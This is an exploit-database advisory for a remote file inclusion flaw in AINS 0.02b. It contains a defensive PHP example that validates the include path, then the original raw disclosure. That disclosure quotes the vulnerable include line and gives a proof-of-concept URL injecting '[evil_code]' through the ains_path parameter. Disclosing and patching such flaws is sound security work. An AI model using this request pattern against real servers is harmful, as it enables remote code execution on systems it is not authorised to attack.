Vendor: AINS
By: ThE dE@Th
CVSS: 7.5 (HIGH)
Remote File Include
CWE: Not provided
Product Name: AINS
Affected Version From: 0.02b
Affected Version To: 0.02b
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested:
2007

AINS 0.02b – Remote File Include Vulnerabilities

This vulnerability allows remote attackers to include arbitrary files via a URL in the ains_path parameter in ains_main.php.

Mitigation:

The vendor should sanitize user input before including files to prevent remote file inclusion attacks.
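
One way to apply this mitigation, as an added example that is not AINS code or a vendor patch: the base path is set server-side and canonicalised before the include, so a request-supplied ains_path is never used. It assumes the parameter reaches $ains_path through register_globals or a similar import of request variables; the helper name ains_resolve_base is hypothetical.

```php
<?php
// Added example, not part of AINS. Replaces the pattern reported in ains_main.php:
//   include("$ains_path/ains_global.inc");   // path taken from the request

/**
 * Hypothetical helper: return the canonical local directory that holds
 * ains_global.inc, or throw if the candidate is not under $allowedRoot.
 */
function ains_resolve_base(string $candidate, string $allowedRoot): string
{
    // realpath() resolves local filesystem paths only; URLs and stream
    // wrappers (http://, ftp://, php://) come back as false.
    $root = realpath($allowedRoot);
    $base = realpath($candidate);
    if ($root === false || $base === false) {
        throw new RuntimeException('AINS base path does not exist locally');
    }

    // The canonical path must be the root or a directory beneath it, so
    // "../" sequences and symlinks cannot lead outside the install.
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($base !== $root && strpos($base, $prefix) !== 0) {
        throw new RuntimeException('AINS base path is outside the allowed root');
    }

    if (!is_file($base . DIRECTORY_SEPARATOR . 'ains_global.inc')) {
        throw new RuntimeException('ains_global.inc not found in base path');
    }
    return $base;
}

try {
    // Assigned unconditionally from server-side data (never $_GET, $_POST or
    // $_COOKIE), which also overwrites any value that register_globals
    // (assumed here) imported from the request.
    $ains_path = ains_resolve_base(__DIR__, __DIR__);
    include $ains_path . DIRECTORY_SEPARATOR . 'ains_global.inc';
} catch (RuntimeException $e) {
    // Fail closed: log the reason server-side, reveal nothing to the client.
    error_log('AINS include refused: ' . $e->getMessage());
    http_response_code(500);
    exit;
}
```

Independently of the code change, keeping `allow_url_include = Off` in php.ini (the default) prevents include from fetching URLs at all.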

Exploit-DB raw data:

AINS 0.02b - Remote File Include Vulnerabilities

Download: http://puzzle.dl.sourceforge.net/sourceforge/wassup/AINS002beta.zip
Found by ThE dE@Th
Greetings for: AsB-May Team & HaCk.eGy


ains_main.php:


include("$ains_path/ains_global.inc");


http://www.site.com/[path]/ains_main.php?ains_path=[evil_code]

# milw0rm.com [2007-01-26]